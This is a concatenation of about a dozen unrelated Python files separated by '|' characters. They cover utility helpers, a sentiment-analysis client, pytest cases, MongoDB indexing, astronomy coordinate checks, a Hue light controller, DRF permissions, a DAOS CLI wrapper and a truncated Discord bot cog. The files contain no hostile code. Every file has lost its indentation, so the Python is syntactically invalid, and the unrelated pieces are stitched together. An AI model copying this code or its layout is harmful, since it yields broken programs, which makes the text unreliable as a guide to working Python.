def g(lst,f=3):
return map(lambda x: round(x,f),lst)
def items(x):
if isinstance(x,(list,tuple)):
for y in x:
for z in items(y):
yield z
else:
yield x
def printm(matrix):
s = [[str(e) for e in row] for row in matrix]
lens = [max(map(len, col)) for col in zip(*s)]
fmt = ' | '.join('{{:{}}}'.format(x) for x in lens)
for row in [fmt.format(*row) for row in s]:
print(row)
def ditto(m,mark="."):
def worker(lst):
out = []
for i,now in enumerate(lst):
before = old.get(i,None) # get old it if exists
out += [mark if before == now else now]
old[i] = now # next time, 'now' is the 'old' value
return out # the lst with ditto marks inserted
old = {}
return [worker(row) for row in m]
#-------------------------------------------------
def cache(f):
name = f.__name__
def wrapper(i):
i._cache = i._cache or {}
key = (name, i.id)
if key in i._cache:
x = i._cache[key]
else:
x = f(i) # sigh, gonna have to call it
i._cache[key] = x # ensure ache holds 'c'
return x
return wrapper
@contextmanager
def duration():
t1 = time.time()
yield
t2 = time.time()
print("\n" + "-" * 72)
print("# Runtime: %.3f secs" % (t2-t1))
def use(x,**y): return (x,y)
@contextmanager
def settings(*usings):
for (using, override) in usings:
using(**override)
yield
for (using,_) in usings:
using()
@contextmanager
def study(what,*usings):
print("\n#" + "-" * 50,
"\n#", what, "\n#",
datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S"))
for (using, override) in usings:
using(**override)
rseed(the.LIB.seed)
show(the)
with duration():
yield
for (using,_) in usings:
using()
|
import pycurl
try:
from urllib.parse import urlencode
except:
from urllib import urlencode
try:
from BytesIO import BytesIO
except ImportError:
from io import BytesIO
import json
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from gensim import corpora, models
from nltk.stem import WordNetLemmatizer, SnowballStemmer
from nltk.stem.porter import *
from exception import *
import nltk
nltk.download('wordnet')
TOPICS = 2
NUM_WORDS = 10
def CurlRequest(data, url = 'http://text-processing.com/api/sentiment/'):
c = pycurl.Curl()
buf = BytesIO()
c.setopt(pycurl.URL, url)
c.setopt(pycurl.WRITEFUNCTION,buf.write)
post_data = {'text':data}
post_field = urlencode(post_data)
c.setopt(c.POSTFIELDS,post_field)
c.perform()
c.close()
res = buf.getvalue().decode('UTF-8')
if res != None and res != "":
d = json.loads(res)
if 'label' in d:
return d['label']
else:
return None
else:
return None
def SentimentAnalysis(data, url = 'http://text-processing.com/api/sentiment/'):
c = pycurl.Curl()
buf = BytesIO()
c.setopt(pycurl.URL, url)
c.setopt(pycurl.WRITEFUNCTION,buf.write)
post_data = {'text':data}
post_field = urlencode(post_data)
c.setopt(c.POSTFIELDS,post_field)
c.perform()
c.close()
res = buf.getvalue().decode('UTF-8')
if res != None and res != "":
try:
d = json.loads(res)
if 'label' in d:
return [d['label'], d['probability'][d['label']]]
except Exception as e:
pass
else:
return None
class TextProcess:
def __init__(self):
self.__stemmer = SnowballStemmer(language = 'english')
def lemmatizeText(self,text):
return self.__stemmer.stem(WordNetLemmatizer().lemmatize(text))
def preprocess(self,text):
result = []
#prreprocess the tweets, i.e, removing links, rt, username
text = re.sub(r'@\w+','',text)
text = re.sub(r'http:\/\/\w+(\.\w+)*','',text)
#print(text)
for token in simple_preprocess(text):
if token not in STOPWORDS and len(token)>3:
result.append(self.lemmatizeText(token))
return result
def deleteAt(self,text):
text = re.sub(r'@\w+','',text)
return text
def deleteHttp(self,text):
text = re.sub(r'http\S+','',text)
return text
def findTopics(self,text):
tokens = self.preprocess(text)
if not isinstance(tokens, list):
raise TeleException(Type.WrongTypeException,'tokens should be list')
dictionary = corpora.Dictionary([tokens])
corpus = [dictionary.doc2bow(tokens)]
lda_model = models.ldamodel.LdaModel(corpus, num_topics = TOPICS, id2word = dictionary, passes = 20)
return lda_model.print_topics(num_topics = TOPICS, num_words = NUM_WORDS)
|
"""
Unit tests for `calculator` module.
"""
import pytest
from homework_1.sample_project.calculator.calc import check_power_of_2
@pytest.mark.parametrize(
["value", "expected_result"],
[
pytest.param(
-1,
False,
id="False case: -1 is not a power of 2.",
),
pytest.param(
0,
False,
id="False case: 0 is not a power of 2.",
),
pytest.param(
1,
True,
id="True case: 2**0 = 1.",
),
pytest.param(
2,
True,
id="True case: 2**1 = 2.",
),
pytest.param(
12,
False,
id="False case: 12 is not a power of 2.",
),
pytest.param(
65536,
True,
id="True case: 2**16 = 65536.",
),
pytest.param(
2 ** 29,
True,
id="True case: 2**29.",
),
pytest.param(
2 ** (49 - 1),
True,
id="True case: 2**(49-1).",
),
pytest.param(
2 ** (53 + 1),
True,
id="True case: 2**(53+1).",
),
],
)
def test_power_of_2(value: int, expected_result: bool):
"""
Passes test if `check_power_of_2`(`value`)
is equal to `expected_result`.
"""
assert check_power_of_2(value) == expected_result
|
import asyncio
from motor.motor_asyncio import AsyncIOMotorClient
from common.config import config
motor = AsyncIOMotorClient(
"mongodb://{username}:{password}@{host}:{port}/{database}".format(
**config["database"]
)
)
db = motor[config["database"]["database"]]
async def setup_collections():
await db.image.create_index("created_at")
await db.image.create_index("channel")
await db.image.create_index("attachment_id")
await db.image.create_index("deleted")
await db.channel.create_index("alias")
if __name__ == "__main__":
print("Setting up indexes for database")
loop = asyncio.get_event_loop()
loop.run_until_complete(setup_collections())
print("done!")
|
"""Compare results with those from SLALIB.
Use this interactvely in iPython. Then copy files to pytpm/tests/data
so that automated tests can be performed.
"""
import math
from pyslalib import slalib
from read_data import get_ndwfs
tab = get_ndwfs()
# sla_fk54z.
# Convert FK5 J2000 coordinates, with zero-proper motion in the
# inertial FK5 frame to FK4 B1950.0 frame. These will have non-zero
# proper motion in the FK4 frame.
#raj2_rad = (math.radians(i) for i in tab['raj2'])
#decj2_rad = (math.radians(i) for i in tab['decj2'])
#
#rab1 = []
#decb1 = []
#pmab1 = []
#pmdb1 = []
#
#for r,d in zip(raj2_rad, decj2_rad):
# x,y,p,m = slalib.sla_fk54z(r, d, 1950.0)
# rab1.append(math.degrees(x))
# decb1.append(math.degrees(y))
# # rad/trp. year to milli-arcsec per trp. year. NOT pma*cos(d).
# pmab1.append(math.degrees(p)*3600.0*1e3)
# # Milli-arcsec per trp. year.
# pmdb1.append(math.degrees(m)*3600.0*1e3)
#
#with open("slalib_ndwfs_fk54z.txt","w") as f:
# for r,d,p,m in zip(rab1, decb1, pmab1, pmdb1):
# # The formats are all very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec. pm is in milli-arsec per year.
# s = "%14.9f %14.9f %10.4f %10.4f\n" # 10.4 is very generous.
# f.write(s % (r, d, p, m))
# sla_fk45z.
# Convert FK4 B1950.0 coordinates to FK5 J2000 coordinates, assuming
# that they has zero-proper motion in the latter. This requires
# correcting for the apparent proper motion induced by the rotating FK4
# frame and hence the epoch is needed.
#rab1_rad = (math.radians(i) for i in tab['rab1'])
#decb1_rad = (math.radians(i) for i in tab['decb1'])
#
#raj2 = []
#decj2 = []
#for r,d in zip(rab1_rad, decb1_rad):
# x,y = slalib.sla_fk45z(r, d, 1950.0)
# raj2.append(math.degrees(x))
# decj2.append(math.degrees(y))
#
#with open("slalib_ndwfs_fk45z.txt","w") as f:
# for r,d in zip(raj2, decj2):
# # The formats are all very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec.
# s = "%14.9f %14.9f\n"
# f.write(s % (r, d))
# sla_eqecl.
# Convert J2000.0 FK5 equatorial coordinates to IAU 1980 ecliptic
# coordinates at J2000.0
#raj2 = (math.radians(i) for i in tab['raj2'])
#decj2 = (math.radians(i) for i in tab['decj2'])
#
#ecl_lon = []
#ecl_lat = []
#
#for r, d in zip(raj2, decj2):
# x, y = slalib.sla_eqecl(r, d, 51544.5)
# ecl_lon.append(math.degrees(x))
# ecl_lat.append(math.degrees(y))
#
#with open("slalib_ndwfs_eqecl.txt", "w") as f:
# for i, j in zip(ecl_lon, ecl_lat):
# # The format is very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec.
# s = "%14.9f %14.9f \n"
# f.write(s % (i, j))
# sla_ecleq.
# Convert IAU 1980 J2000 ecliptic coordinates to FK5 J2000 equatorial
# coordinates.
#ecl_lon = (math.radians(i) for i in tab['elon2'])
#ecl_lat = (math.radians(i) for i in tab['elat2'])
#
#raj2 = []
#decj2 = []
#
#for r, d in zip(ecl_lon, ecl_lat):
# x, y = slalib.sla_ecleq(r, d, 51544.5)
# raj2.append(math.degrees(x))
# decj2.append(math.degrees(y))
#
#with open("slalib_ndwfs_ecleq.txt", "w") as f:
# for i, j in zip(raj2, decj2):
# # The format is very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec.
# s = "%14.9f %14.9f \n"
# f.write(s % (i, j))
# sla_eqgal.
# Convert FK5 J2000.0 equatorial coordinates to galactic.
#raj2 = (math.radians(i) for i in tab['raj2'])
#decj2 = (math.radians(i) for i in tab['decj2'])
#
#gal_lon = []
#gal_lat = []
#
#for r, d in zip(raj2, decj2):
# x, y = slalib.sla_eqgal(r, d)
# gal_lon.append(math.degrees(x))
# gal_lat.append(math.degrees(y))
#
#with open("slalib_ndwfs_eqgal.txt", "w") as f:
# for l, b in zip(gal_lon, gal_lat):
# # The format is very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec.
# s = "%14.9f %14.9f \n"
# f.write(s % (l, b))
#sla_galeq.
# Convert galactic coordinates to FK5 J2000 coordinates.
#gal_lon = (math.radians(i) for i in tab['glon'])
#gal_lat = (math.radians(i) for i in tab['glat'])
#
#raj2 = []
#decj2 = []
#
#for l, b in zip(gal_lon, gal_lat):
# x, y = slalib.sla_galeq(l, b)
# raj2.append(math.degrees(x))
# decj2.append(math.degrees(y))
#
#with open("slalib_ndwfs_galeq.txt", "w") as f:
# for r, d in zip(raj2, decj2):
# # The format is very generous. The data are never this
# # accurate. .9 => ~1e-5 arc-sec.
# s = "%14.9f %14.9f \n"
# f.write(s % (r, d))
|
from __future__ import annotations
import os
from phue import Bridge, PhueRegistrationException
from .controller import LightController, LightInfo
NAME = "hue"
class HueLightController(LightController):
def __init__(self, bridge_ip: str):
self.bridge = self.initialize_hue_bridge(bridge_ip)
def change_light_state(self, color_mode: str, on: bool = True, **kwargs):
kwargs["on"] = on
self.bridge.set_light(self.light_id, kwargs)
def get_light_info(self) -> LightInfo:
light = self.bridge.get_light(self.light_id)
lightinfo = LightInfo(
model_id=light["modelid"],
)
if "ct" in light["capabilities"]["control"]:
lightinfo.min_mired = light["capabilities"]["control"]["ct"]["min"]
lightinfo.max_mired = light["capabilities"]["control"]["ct"]["max"]
return lightinfo
def initialize_hue_bridge(self, bridge_ip: str) -> Bridge:
config_file_path = os.path.join(os.path.dirname(__file__), "../.persistent/.python_hue")
try:
bridge = Bridge(ip=bridge_ip, config_file_path=config_file_path)
except PhueRegistrationException as err:
print("Please click the link button on the bridge, than hit enter..")
input()
bridge = Bridge(ip=bridge_ip, config_file_path=config_file_path)
return bridge
def get_questions(self) -> list[dict]:
light_list = []
for light in self.bridge.lights:
light_list.append(
{"key": light.light_id, "value": light.light_id, "name": light.name}
)
return [
{
"type": "list",
"name": "light",
"message": "Select the light?",
"choices": light_list,
},
]
def process_answers(self, answers):
self.light_id = answers["light"]
|
from rest_framework import permissions
from guardian.shortcuts import get_user_perms
### Project Spendings permissions
class hasAddProjectBudgetSpendingsPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
permissions = get_user_perms(request.user, obj)
return 'add_project_spendings' in permissions
class hasChangeProjectBudgetSpendingsPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
project = obj.project
permissions = get_user_perms(request.user, project)
return 'change_project_spendings' in permissions
class hasDeleteProjectBudgetSpendingsPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
project = obj.project
permissions = get_user_perms(request.user, project)
return 'delete_project_spendings' in permissions
class hasViewProjectBudgetSpendingsPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
project = obj.project
permissions = get_user_perms(request.user, project)
return 'view_project_spendings' in permissions
|
from distutils.core import setup
import py2exe
setup(console=['dialer.py'])
"""
may need to download VC redistrutable
https://www.microsoft.com/en-us/download/details.aspx?id=29
tutorial:
http://www.py2exe.org/index.cgi/Tutorial
"""
|
"""
With a given data_sets.ini configuration listing the name of a dataset by HighVoltage-LowVoltage,
creates the expected dataset to be run upon by main.py
Data is collected from a local "Spice Simulation" directory relative to the python script and
produced in a Simulation_Sets folder to be run upon.
"""
import os
import configparser
# Makes datasets based on the data_sets.ini file
# Needed params: Full Voltage, Shade Voltage as well as Dataset name. (Just append to given list)
if __name__ == '__main__':
# Run this script right next to Spice Simulation folder
path = os.path.abspath('Spice Simulation/')
# Read in datasets to make
config = configparser.ConfigParser()
config.read('data_sets.ini')
data_sets = [[key, config[key]['temps']] for key in config.keys() if key != 'DEFAULT']
# print(data_sets)
to_run_sets = []
for set, temps in data_sets:
# Step 1: Collect Temperatures to Run
if not temps:
temp_sets = [27, 30, 35, 40, 45, 50]
print(set, temp_sets)
else:
var_sets = temps.split(', ')
temp_sets = []
for val in var_sets:
if '-' in val:
lower, upper = val.split('-')
results = [x for x in range(int(lower), int(upper) + 1)]
else:
results = [int(val)]
temp_sets += results
print(set, temp_sets)
to_run_sets.append((set, temp_sets))
# Only check these folders for data
folders_to_check = ['1x10', '2x4', '2x5', '3x3', '4x2', '5x2', '10x1']
for dir in os.scandir(path):
if dir.is_dir() and dir.name in folders_to_check:
print(f'Main Directory: {dir.name}')
# Highly inefficient but lazy method
for file in os.scandir(dir.path):
if file.is_file() and file.name.endswith('cir'):
print(f'Creating Dataset from {file.name}')
for set, temps in to_run_sets:
for temperatures in temps:
full_path = os.path.abspath(
f"Simulation_Sets\\{set}\\Temp{temperatures}\\{dir.name}\\")
os.makedirs(full_path, exist_ok=True)
high, low = set.split('-') # Get high and low voltages expected
with open(file.path, 'r') as f:
ltspice_file = f.read()
# Update the necessary data (Temperature, High voltage, Low Voltage)
ltspice_file = ltspice_file.replace('temp=30', f'temp={temperatures}')
ltspice_file = ltspice_file.replace('900', low)
ltspice_file = ltspice_file.replace('1000', high)
with open(full_path + '\\' + file.name, 'w') as f:
f.write(ltspice_file) # write out the file to correct pathing
elif file.is_file() and file.name == 'cell_2.lib':
for set, temps in to_run_sets:
for temperatures in temps:
full_path = os.path.abspath(
f"Simulation_Sets\\{set}\\Temp{temperatures}\\{dir.name}\\")
with open(file.path, 'r') as file_r, open(full_path + '\\' + file.name, 'w') as f:
f.write(file_r.read()) # write out the file to correct pathing
|
#!/usr/bin/python
"""
(C) Copyright 2018-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import re
import traceback
from daos_utils_base import DaosCommandBase
class DaosCommand(DaosCommandBase):
# pylint: disable=too-many-ancestors,too-many-public-methods
"""Defines a object representing a daos command."""
METHOD_REGEX = {
"run": r"(.*)",
"container_create": r"container ([0-9a-f-]+)",
"container_query":
r"Pool UUID:\s+([0-9a-f-]+)\n" +
r"Container UUID:\s+([0-9a-f-]+)\n" +
r"Number of snapshots:\s+(\d+)\n" +
r"Latest Persistent Snapshot:\s+(\d+)\n" +
r"Highest Aggregated Epoch:\s+(\d+)",
}
def pool_query(self, pool, sys_name=None, sys=None):
"""Query a pool.
Args:
pool (str): pool UUID
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
sys (str, optional): [description]. Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos pool query command fails.
"""
return self._get_json_result(
("pool", "query"), pool=pool, sys_name=sys_name, sys=sys)
def pool_autotest(self, pool):
"""Runs autotest for pool
Args:
pool (str): pool UUID
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos pool autotest command fails.
"""
return self._get_result(
("pool", "autotest"), pool=pool)
def container_create(self, pool, sys_name=None, cont=None,
path=None, cont_type=None, oclass=None,
chunk_size=None, properties=None, acl_file=None):
# pylint: disable=too-many-arguments
"""Create a container.
Args:
pool (str): UUID of the pool in which to create the container
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
cont (str, optional): container UUID. Defaults to None.
path (str, optional): container namespace path. Defaults to None.
cont_type (str, optional): the type of container to create. Defaults
to None.
oclass (str, optional): object class. Defaults to None.
chunk_size (str, optional): chunk size of files created. Supports
suffixes: K (KB), M (MB), G (GB), T (TB), P (PB), E (EB).
Defaults to None.
properties (str, optional): String of comma-separated <name>:<value>
pairs defining the container properties. Defaults to None
acl_file (str, optional): ACL file. Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container create command fails.
"""
return self._get_result(
("container", "create"), pool=pool, sys_name=sys_name,
cont=cont, path=path, type=cont_type, oclass=oclass,
chunk_size=chunk_size, properties=properties, acl_file=acl_file)
def container_clone(self, src, dst):
"""Clone a container to a new container.
Args:
src (str): the source, formatted as daos://<pool>/<cont>
dst (str): the destination, formatted as daos://<pool>/<cont>
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container clone command fails.
"""
return self._get_result(
("container", "clone"), src=src, dst=dst)
def container_destroy(self, pool, cont, force=None, sys_name=None):
"""Destroy a container.
Args:
pool (str): UUID of the pool in which to create the container
cont (str): container UUID.
force (bool, optional): Force the container destroy. Defaults to
None.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container destroy command fails.
"""
return self._get_result(
("container", "destroy"), pool=pool, sys_name=sys_name,
cont=cont, force=force)
def container_check(self, pool, cont, sys_name=None, path=None):
"""Check the integrity of container objects.
Args:
pool (str): UUID of the pool in which to create the container
cont (str): container UUID.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
path (str): Container namespace path. Defaults to None
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container check command fails.
"""
return self._get_result(
("container", "check"), pool=pool, cont=cont,
sys_name=sys_name, path=path)
def container_get_acl(self, pool, cont,
verbose=False, outfile=None):
"""Get the ACL for a given container.
Args:
pool (str): Pool UUID
cont (str): Container for which to get the ACL.
verbose (bool, optional): Verbose mode.
outfile (str, optional): Write ACL to file.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container get-acl command fails.
"""
return self._get_result(
("container", "get-acl"), pool=pool, cont=cont,
verbose=verbose, outfile=outfile)
def container_delete_acl(self, pool, cont, principal):
"""Delete an entry for a given principal in an existing container ACL.
Args:
pool (str): Pool UUID
cont (str): Container for which to get the ACL.
principal (str): principal portion of the ACL.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container delete-acl command fails.
"""
return self._get_result(
("container", "delete-acl"), pool=pool, cont=cont,
principal=principal)
def container_overwrite_acl(self, pool, cont, acl_file):
"""Overwrite the ACL for a given container.
Args:
pool (str): Pool UUID
cont (str): Container for which to get the ACL.
acl_file (str): input file containing ACL
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container overwrite-acl command fails.
"""
return self._get_result(
("container", "overwrite-acl"), pool=pool, cont=cont,
acl_file=acl_file)
def container_update_acl(self, pool, cont, entry=None, acl_file=None):
"""Add or update the ACL entries for a given container.
Args:
pool (str): Pool UUID
cont (str): Container for which to get the ACL.
entry (bool, optional): Add or modify a single ACL entry
acl_file (str, optional): Input file containing ACL
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container get-acl command fails.
"""
return self._get_result(
("container", "update-acl"), pool=pool, cont=cont,
entry=entry, acl_file=acl_file)
def container_list(self, pool, sys_name=None):
"""List containers in the given pool.
Args:
pool (str): Pool label or UUID
sys_name (str, optional): System name. Defaults to None.
Returns:
dict: JSON output
Raises:
CommandFailure: if the daos container list command fails.
"""
# Sample output.
# {
# "response": [
# {
# "UUID": "bad80a98-aabd-498c-b001-6547cd061c8c",
# "Label": "container_label_not_set"
# },
# {
# "UUID": "dd9fc365-5729-4736-9d34-e46504a4a92d",
# "Label": "mkc1"
# }
# ],
# "error": null,
# "status": 0
# }
return self._get_json_result(
("container", "list"), pool=pool, sys_name=sys_name)
def pool_set_attr(self, pool, attr, value, sys_name=None):
"""Set pool attribute.
Args:
pool (str): Pool UUID.
attr (str): Attribute name.
value (str): Attribute value.
sys_name (str): DAOS system name. Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos pool set-attr command fails.
"""
return self._get_result(
("pool", "set-attr"), pool=pool, attr=attr, value=value,
sys_name=sys_name)
def pool_get_attr(self, pool, attr, sys_name=None):
"""Set pool attribute.
Args:
pool (str): Pool UUID.
attr (str): Pool UUID.
sys_name (str): DAOS system name. Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos pool query command fails.
"""
return self._get_json_result(
("pool", "get-attr"), pool=pool, attr=attr, sys_name=sys_name)
def pool_list_attrs(self, pool, sys_name=None, verbose=False):
"""List pool attributes.
Args:
pool (str): Pool UUID.
sys_name (str): DAOS system name. Defaults to None.
verbose (bool): False - name only. True - name and value. Defaults
to False.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos pool list-attrs command fails.
"""
return self._get_json_result(
("pool", "list-attrs"), pool=pool, sys_name=sys_name,
verbose=verbose)
def container_query(self, pool, cont, sys_name=None):
"""Query a container.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container query command fails.
"""
return self._get_result(
("container", "query"), pool=pool, cont=cont,
sys_name=sys_name)
def container_set_prop(self, pool, cont, prop, value):
"""Call daos container set-prop.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
prop (str): Container property-name.
value (str): Container property-name value to set.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container set-prop command fails.
"""
prop_value = ":".join([prop, value])
return self._get_result(
("container", "set-prop"),
pool=pool, cont=cont, prop=prop_value)
def container_get_prop(self, pool, cont):
"""Call daos container get-prop.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container get-prop command fails.
"""
return self._get_result(
("container", "get-prop"), pool=pool, cont=cont)
def container_set_owner(self, pool, cont, user, group):
"""Call daos container set-owner.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
user (str): New-user who will own the container.
group (str): New-group who will own the container.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container set-owner command fails.
"""
return self._get_result(
("container", "set-owner"),
pool=pool, cont=cont, user=user, group=group)
def container_set_attr(
self, pool, cont, attr, val, sys_name=None):
"""Call daos container set-attr.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
attr (str): Attribute name.
val (str): Attribute value.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container set-attr command fails.
"""
return self._get_result(
("container", "set-attr"), pool=pool, cont=cont,
sys_name=sys_name, attr=attr, value=val)
def container_get_attr(self, pool, cont, attr, sys_name=None):
"""Call daos container get-attr.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
attr (str): Attribute name.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
dict: Dictionary that stores the attribute and value in "attr" and
"value" key.
Raises:
CommandFailure: if the daos get-attr command fails.
"""
self._get_result(
("container", "get-attr"), pool=pool, cont=cont,
sys_name=sys_name, attr=attr)
# Sample output.
# Container's `&()\;'"!<> attribute value: attr12
match = re.findall(
r"Container's\s+([\S ]+)\s+attribute\s+value:\s+(.+)$",
self.result.stdout_text)
data = {}
if match:
data["attr"] = match[0][0]
data["value"] = match[0][1]
return data
def container_list_attrs(self, pool, cont, sys_name=None):
"""Call daos container list-attrs.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
dict: Dictionary that stores the attribute values in the key "attrs"
Raises:
CommandFailure: if the daos container list-attrs command fails.
"""
self._get_result(
("container", "list-attrs"), pool=pool, cont=cont,
sys_name=sys_name)
# Sample output.
# Container attributes:
# attr0
# ~@#$%^*-=_+[]{}:/?,.
# aa bb
# attr48
match = re.findall(r"\n([\S ]+)", self.result.stdout_text)
return {"attrs": match}
def container_create_snap(self, pool, cont, snap_name=None, epoch=None,
sys_name=None):
"""Call daos container create-snap.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
snap_name (str, optional): Snapshot name. Defaults to None.
epoch (str, optional): Epoch number. Defaults to None.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
Returns:
dict: Dictionary that stores the created epoch in the key "epoch".
Raises:
CommandFailure: if the daos container create-snap command fails.
"""
self._get_result(
("container", "create-snap"), pool=pool, cont=cont,
sys_name=sys_name, snap=snap_name, epc=epoch)
# Sample create-snap output.
# snapshot/epoch 1582610056530034697 has been created
data = {}
match = re.findall(
r"[A-Za-z\/]+\s([0-9]+)\s[a-z\s]+", self.result.stdout_text)
if match:
data["epoch"] = match[0]
return data
def container_destroy_snap(self, pool, cont, snap_name=None, epc=None,
sys_name=None, epcrange=None):
"""Call daos container destroy-snap.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
snap_name (str, optional): Snapshot name. Defaults to None.
epc (str, optional): Epoch value of the snapshot to be destroyed.
Defaults to None.
sys_name (str, optional): DAOS system name context for servers.
Defaults to None.
epcrange (str, optional): Epoch range in the format "<start>-<end>".
Defaults to None.
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos container destroy-snap command fails.
"""
kwargs = {
"pool": pool,
"cont": cont,
"sys_name": sys_name,
"snap": snap_name,
"epc": epc,
"epcrange": epcrange
}
return self._get_result(("container", "destroy-snap"), **kwargs)
def container_list_snaps(self, pool, cont):
"""List snapshot in a container.
Args:
pool (str): Pool UUID.
cont (str): Container UUID.
Returns:
dict: Dictionary that contains epoch values in key "epochs". Value
is a list of string.
"""
self._get_result(
("container", "list-snaps"), pool=pool, cont=cont)
# Sample container list-snaps output.
# Container's snapshots :
# 1598478249040609297 1598478258840600594 1598478287952543761
data = {}
match = re.findall(r"(\d+)", self.result.stdout_text)
if match:
data["epochs"] = match
return data
def object_query(self, pool, cont, oid, sys_name=None):
"""Call daos object query and return its output with a dictionary.
Args:
pool (str): Pool UUID
cont (str): Container UUID
oid (str): oid hi lo value in the format <hi>.<lo>
sys_name (str, optional): System name. Defaults to None.
Returns:
dict: cmd output
oid: (oid.hi, oid.lo)
ver: num
grp_nr: num
layout: [{grp: num, replica: [(n0, n1), (n2, n3)...]}, ...]
Each row of replica nums is a tuple and stored top->bottom.
Raises:
CommandFailure: if the daos object query command fails.
"""
self._get_result(
("object", "query"), pool=pool, cont=cont,
oid=oid, sys_name=sys_name)
# Sample daos object query output.
# oid: 1152922453794619396.1 ver 0 grp_nr: 2
# grp: 0
# replica 0 1
# replica 1 0
# grp: 1
# replica 0 0
# replica 1 1
data = {}
vals = re.findall(
r"oid:\s+([\d.]+)\s+ver\s+(\d+)\s+grp_nr:\s+(\d+)|"\
r"grp:\s+(\d+)\s+|"\
r"replica\s+(\d+)\s+(\d+)\s*", self.result.stdout_text)
try:
oid_vals = vals[0][0]
oid_list = oid_vals.split(".")
oid_hi = oid_list[0]
oid_lo = oid_list[1]
data["oid"] = (oid_hi, oid_lo)
data["ver"] = vals[0][1]
data["grp_nr"] = vals[0][2]
data["layout"] = []
for i in range(1, len(vals)):
if vals[i][3] == "":
if "replica" in data["layout"][-1]:
data["layout"][-1]["replica"].append(
(vals[i][4], vals[i][5]))
else:
data["layout"][-1]["replica"] = [(
vals[i][4], vals[i][5])]
else:
data["layout"].append({"grp": vals[i][3]})
except IndexError:
traceback.print_exc()
self.log.error("--- re.findall output ---")
self.log.error(vals)
return data
def filesystem_copy(self, src, dst):
"""Copy a POSIX container or path to another POSIX container or path.
Args:
src (str): The source, formatted as
daos:<pool>/<cont>/<path> or posix:<path>
dst (str): The destination, formatted as
daos:<pool>/<cont>/<path> or posix:<path>
Returns:
CmdResult: Object that contains exit status, stdout, and other
information.
Raises:
CommandFailure: if the daos filesystem copy command fails.
"""
return self._get_result(
("filesystem", "copy"), src=src, dst=dst)
|
import random
import discord
from discord.ext import commands
from cogs.utils.tools import resolve_emoji
class Action:
def __init__(self, bot):
self.bot = bot
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def cuddle(self, ctx):
"""For when you just need to cuddle someone uwu"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is cuddling **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'***cuddles with you***'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="cuddle", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename='cuddle.gif'))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def hug(self, ctx):
"""Give a person a big fat hug! Awww!"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
